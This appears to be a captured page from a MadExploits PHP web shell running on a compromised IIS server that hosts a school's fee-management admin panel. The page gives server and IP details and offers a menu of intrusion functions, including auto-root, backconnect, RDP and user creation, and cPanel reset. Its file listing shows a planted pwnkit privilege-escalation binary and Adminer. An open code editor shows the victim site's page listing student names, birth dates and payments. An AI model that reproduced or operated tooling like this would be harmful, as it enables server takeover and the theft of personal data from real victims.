Windows NT VMI608383 10.0 build 17763 (Windows Server 2019) AMD64
Microsoft-IIS/10.0
: 144.126.137.138 | : 216.73.216.113
Cant Read [ /etc/named.conf ]
8.1.33
IWPD_484(vsec.in_n1)
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
C: /
Inetpub /
vhosts /
vsec.in /
httpdocs /
ccav /
admin /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-rw-rw-
addrec.php
4.72
KB
-rw-rw-rw-
adminer.php
465.43
KB
-rw-rw-rw-
adminhome.php
4.39
KB
-rw-rw-rw-
bdm.php
8.74
KB
-rw-rw-rw-
config.php
118
B
-rw-rw-rw-
datech.php
5.75
KB
-rw-rw-rw-
deleterecord.php
6.53
KB
-rw-rw-rw-
index.php
2.06
KB
-rw-rw-rw-
modifyrecord.php
13.15
KB
-rw-rw-rw-
nost.php
4.39
KB
-rw-rw-rw-
offpr.php
4.52
KB
-rw-rw-rw-
onfr.php
4.4
KB
-rw-rw-rw-
onpr.php
4.53
KB
-rw-rw-rw-
pwnkit
10.99
KB
-rw-rw-rw-
style1rz.css
2.35
KB
-rw-rw-rw-
uploadrec.php
5.08
KB
-rw-rw-rw-
vsec.png
277.94
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : nost.php
<?php session_start(); require('config.php'); if(!isset($_SESSION['un'])) header('Location: index.php'); if(isset($_POST["logout"])){ session_destroy(); header('Location: index.php'); } if(isset($_POST["adminhome"])){ header('Location: adminhome.php'); } if(isset($_POST["addrec"])){ header('Location: addrec.php'); } if(isset($_POST["offpr"])){ header('Location: offpr.php'); } if(isset($_POST["onpr"])){ header('Location: onpr.php'); } if(isset($_POST["deleterecord"])){ header('Location: deleterecord.php'); } if(isset($_POST["modify"])){ header('Location: modifyrecord.php'); } if(isset($_POST["onfr"])){ header('Location: onfr.php'); } if(isset($_POST["bdm"])){ header('Location: bdm.php'); } if(isset($_POST["nost"])){ header('Location: nost.php'); } if(isset($_POST["uploadrec"])){ header('Location: uploadrec.php'); } ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"> <meta name="viewport" content="width=device-width"> <title>Fee Management-AdminPanel</title> <link rel="stylesheet" type="text/css" href="style1rz.css"> </style> <div class="page"><center> <IMG SRC="VSEC.png"> <hr> <H1><U>Admin Control Panel</U></H1> <form method="post" action="#" align="right"> </head> <body align="center"> <ul> <li><input type="submit" value="Home" name="adminhome" id="adminhome" class="b2"></li> <li><input type="submit" value="Add Records" name="addrec" id="addrec" class="b2"></li> <li><input type="submit" value="Delete Records" name="deleterecord" id="deleterecord" class="b2"></li> <li><input type="submit" value="Modify Records" name="modify" id="modify" class="b2"></li> <li><input type="submit" value="Offline Paid Record" name="offpr" id="offpr" class="b2"></li> <li><input type="submit" value="Online Paid Record" name="onpr" id="onpr" class="b2"></li> <li><input type="submit" value="Online Failed Record" name="onfr" id="onfr" class="b2"></li> <li><input type="submit" value="No Record" name="nost" id="nost" class="b2"></li> <li><input type="submit" value="Bulk Data Management" name="bdm" id="bdm" class="b2"></li> <li><input type="submit" value="Upload/Download Data" name="uploadrec" id="uploadrec" class="b2"></li> <li><input type="submit" value="Logout" name="logout" id="logout" class="b2"></li> </ul> </form> <H2> No Transactions </H2> <input type="text" id="myInput" onkeyup="myFunction()" placeholder="Enter keywords to filter records..."> <table border="1px" class="t1" id="myTable"> <?php $conn = mysqli_connect($host,$username,$password,$dbname); // Check connection if ($conn->connect_error) { die("Connection failed: " . $conn->connect_error); } $a=""; $sql = "SELECT * FROM student where status='$a'"; $result = $conn->query($sql); echo "<tr> <th>Scholar No.</th> <th>Student Name</th> <th>Class</th> <th>Date of Birth</th> <th>Month</th> <th>Amount</th> <th>Status</th> <th>Payment ID</th> </tr>"; if ($result->num_rows > 0) { // output data of each row while($row = $result->fetch_assoc()) { echo "<tr> <td>" . $row["stud_id"]. "</td><td>" . $row["stud_name"] . "</td> <td>". $row["stud_class"]. "</td><td>". $row["dob"]. "</td> <td>". $row["Month"]. "</td><td>". $row["Amount"]. "</td> <td>". $row["status"]. "</td><td>". $row["payid"]. "</td> </tr>"; } } else { echo "<tr> <td colspan=3>No records found</td></tr>"; } $conn->close(); ?> </table> <script> function myFunction() { // Declare variables var input, filter, table, tr, td, i, txtValue; input = document.getElementById("myInput"); filter = input.value.toUpperCase(); table = document.getElementById("myTable"); tr = table.getElementsByTagName("tr"); // Loop through all table rows, and hide those who don't match the search query for (i = 0; i < tr.length; i++) { td = tr[i].getElementsByTagName("td")[0]; if (td) { txtValue = td.textContent || td.innerText; if (txtValue.toUpperCase().indexOf(filter) > -1) { tr[i].style.display = ""; } else { tr[i].style.display = "none"; } } } } </script> <hr> <a href="http://www.vsecnblock.com/"> Click to visit our Home page </a> <h4>Dr. Virendra Swarup Education Center - © 2019</h4> <br> </center> </div> </body> </html>
Close